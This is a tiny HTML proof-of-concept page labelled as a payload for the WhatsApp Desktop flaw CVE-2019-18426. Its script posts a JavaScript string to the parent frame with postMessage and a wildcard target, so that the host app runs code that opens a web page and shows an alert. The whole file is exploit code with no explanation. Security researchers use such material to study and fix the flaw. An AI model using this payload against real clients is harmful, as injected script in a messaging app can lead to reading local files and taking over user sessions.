WhatsApp FS read vuln post CVE-2019-18426

8.html

<html>
  <head></head>
  <body>
    <script>
      top.postMessage(
      JSON.stringify(
      "open('https://facebook.com');
        alert('external payload');"
      ),
      "*");
    </script>
  </body>
</html>